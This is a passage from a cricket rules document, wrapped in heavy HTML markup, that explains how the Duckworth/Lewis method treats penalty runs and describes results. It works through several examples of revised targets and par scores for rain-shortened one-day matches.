runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">needed, ignoring any figures after the decimal point. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">i.e. T = S + (R2 – R1) x G50/100 + 1 (rounded down to a whole number, if </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">necessary) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">6. Penalty Runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">6.1 During Team 1’s innings </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If penalty runs are awarded to the batting side, then their score shall advance </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">accordingly and be taken into account when performing any future D/L </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">calculation. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If penalty runs are awarded to the fielding side, then any D/L </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">calculation in between innings will be performed as normal,</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">and their innings will commence with the score equivalent to</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the number of penalty runs that they have been awarded. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">6.2 During Team 2’s innings </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If penalty runs are awarded to the batting side, then their score shall advance </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">accordingly. These penalty runs do not affect any subsequent D/L calculation. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 40</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">40</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">If penalty runs are awarded to the fielding side, then there will be no recalculation </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">of any D/L target. Instead, the target score and the entire schedule of par scores will advance by the appropriate number of penalty runs. If a loss of overs occurs </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">after such a penalty has been awarded, then the D/L target will be calculated </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">based upon the original score of the side batting first, and this target, and all par </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">scores, will then be raised by the appropriate number of penalty runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">7. The Result and its Description </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">When a revised target has been calculated and the match has been played out to </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">its completion, the result is described exactly as in the case of an uninterrupted </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">match; if Team 2 achieve their revised target they win by the number of wickets </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">they have in hand when they reach this score; if they fall short of their revised </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">target by exactly one run the result is a tie, and if they make a lower score Team 1 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">win by the margin of runs by which Team 2 fall short of the score needed to </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">achieve a tie.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">When a match has to be abandoned with Team 2’s innings in progress (provided </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">sufficient overs have been bowled to constitute a viable match), the result is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">decided by comparing Team 2’s score with the ‘par score’ as defined in 5.5 and </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the winning margin is described in terms of the number of runs by which their </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">score differs from the ‘par score’, regardless of whether Team 1 or Team 2 are </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">the victors.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Whenever a completed game has involved the use of the D/L method, the</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">description should be qualified by appending ‘(D/L method)’. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">7.1 Examples of result description: </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(i) Team 2 are set a revised target of 186. But they only succeed in making 180 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">in their allocation of overs. They thus fall 5 runs short of the 185 runs </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">needed to tie the match and the result is described as ‘Team 1 win by 5 runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(D/L method)’. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(ii) Team 2 are chasing a target of 201 in a 50-over per innings match and reach </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">105/4 after 25 overs when rain causes the match to be abandoned. At this </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">point the ‘par score’ is 100. Team 2 have exceeded this by 5 runs and so the </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">result is described as ‘Team 2 win by 5 runs (D/L method)’. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 1 (Suspension during Team 1’s innings) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">In a 50 over-per-innings match, Team 1 reaches 79/3 after 20 overs and then </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">there is a suspension in play. It is decided that 20 overs of the match should be </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 41</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">41</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">lost, 10 of these by each team. Team 1 resumes to reach a final total of 180 in its </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">revised allocation of 40 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs per innings at the start of match, N = 50 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 1 at start of innings = 100% (5.1) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at suspension (30 overs left, 3 wkts lost = 61.6% </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.1) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at resumption (20 overs left, 3 wkts lost) = 49.1% </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.2) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage lost due to suspension = 61.6 – 49.1 = 12.5% (3.3) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 1, R1 = 100 – 12.5 = 87.5% (5.2) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs available to Team 2 at the start of its innings = 40 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available (40 overs left, 0 wkt lost), R2 = 89.3% (5.4) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is greater than R1, i.e. Team 2 has more resource available than had Team 1,</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">so its target should be increased. S = 180 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T = S + G50 x (R2 – R1)/100 + 1 = 180 + 235 x (89.3 – 87.5)/100 + 1 = 185</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(rounded down). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 2 (delay to start of Team 2’s innings) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">In an English National League match (45 overs per innings), Team 1 scores 212 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">in its allocated 45 overs. Rain then causes Team 2’s response to be delayed and it</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">is decided that it should be shortened to 35 overs.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs at start of match, N = 45. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 1 at start of its innings (45 overs left, 0 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">wkt lost) = 95.0% (5.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">The innings was not interrupted, so R1 = 95.0%</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs available to Team 2 at start of its innings = 35</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 2 at start of innings (35 overs left, 0 wkt</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">lost) R2 = 82.7% (5.4)</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 212 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 42</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">42</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T = S x R2/R1 + 1 = 212 x 82.7/95.0 + 1 = 185 (rounded down). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 3 (suspension during Team 2’s innings) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">In an One Day International match (50 overs per innings), Team 1 has scored 250</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">from its allocation of 50 overs in an uninterrupted innings. Team 2 has received </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">12 overs and has scored 40/1. Then play is suspended and 10 overs are lost. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs at start of match, N = 50. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1’s innings was uninterrupted, so its resource percentage available, R1 = </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">100% (5.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 2 at start of innings = 100% (5.4).</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at suspension (38 overs left, 1 wkt lost) = 82.0% </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at resumption (28 overs left, 1 wkt lost) = 68.8%</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.2). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage lost due to suspension = 82.0 – 68.8 = 13.2% (3.3). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 2, R2 = 100 – 13.2 = 86.8% (5.5). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 250. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T = S x R2/R1 + 1 = 250 x 86.8/100 + 1 = 218 , and it needs a further 178 runs</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">from 28 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 4 (multiple suspensions and abandonment) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Suppose that in Example 3, play continues for a further 10 overs during which </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2 takes its score on to 98/3, whereupon there is another suspension in play</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">and 2 more overs are lost. A further 8.2 overs are bowled and Team 2 is 154/6 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">when rain washes out the match. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1’s resource percentage is still R1 = 100%. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s resource percentage has been reduced further. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at start of second suspension (18 overs left, 3 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">wkts lost) = 45.9% (3.1).</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 43</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">43</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at end of second suspension (16 overs left, 3 wkts</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">lost) = 42.3% (3.2). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage lost due to second suspension = 45.9 – 42.3 = 3.6% (3.3). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 2, R2 = 86.8 – 3.6 = 83.2% (5.5). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 250. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is T = S x R2/R1 + 1 = 250 x 83.2/100 + 1 = 209 and it needs a further 111 runs </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">from 16 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">When the innings had to be terminated, there were 7.4 overs remaining. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at termination of Team 2’s innings (7.4 overs left, </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">6 wkts lost) = 19.4%. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">This remaining resource is lost by the termination.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available to Team 2, R2 = 83.2 – 19.4 = 63.8% (5.5). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 250. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s par score (5.5 and 5.6) is S x R2/R1 = 250 x 63.8/100 = 159 (rounded </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">down); the par score at the instant of abandonment is 159 and with a score of 154 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">it has lost by 5 runs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1 wins by 5 runs (D/L method) (7). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 5 (suspension and termination of Team 1’s innings mid-over and delay</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">to Team 2’s innings) </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">This is taken form an actual ODI: India (Team 1) versus Pakistan (Team 2), </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Singapore, April 1996. Team 1 scores 226/8 in 47.1 of a scheduled 50 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Rain then terminates Team 1’s innings and delays that of Team 2, which is given </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">a reduced allocation of 33 overs. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Number of overs per innings at start of match, N = 50 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1’s innings: </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage at start of innings is 100% (5.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at termination (2.5 overs left, 8 wkts lost) = 6.9%</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage lost due to termination = 6.9% (3.4). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available, R1 = 100 – 8.1 = 93.1% (5.2). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"> </span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Page 44</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">44</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s innings (allocated 33 overs): </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available at star to f innings (33 overs left, 0 wkts lost), R2 </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">= 79.8% (5.4). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 226. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T = S x R2/R1 + 1 = 226 x 79.8/93.1 + 1 = 194 (rounded down). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Example 6 (as Example 5 but with a further interruption during Team 2’s</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">innings)</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">In the match of the previous example, Team 2 has scored 140 for 2 after 25 overs </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">when a further 5 overs are lost to the weather. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 1’s resource percentage is still R1 = 93.1%.</span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s innings: </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage at start of innings (33 overs left, 0 wkt lost) = 79.8% (5.4). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at suspension (8 overs left, 2 wkts lost) = 25.5% </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.1). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage remaining at resumption (3 overs left, 2 wkts lost) = 10.4 % </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">(3.2). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage lost due to suspension = 25.5 – 10.4 = 15.1% (3.3). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Resource percentage available, R2 = 79.8 – 15.1 = 64.7% (5.2). </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">R2 is less than R1; S = 226. </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">Team 2’s revised target (5.6) is </span></span></span></span><br /><span style="font-size:85%;"><span style="line-height: 100%;"><span style="font-family:Comic Sans MS;"><span style="font-family:arial;">T = S x R2/R1 + 1 = 226 x 64.7/93.1 + 1 = 158 (rounded down) and it needs a 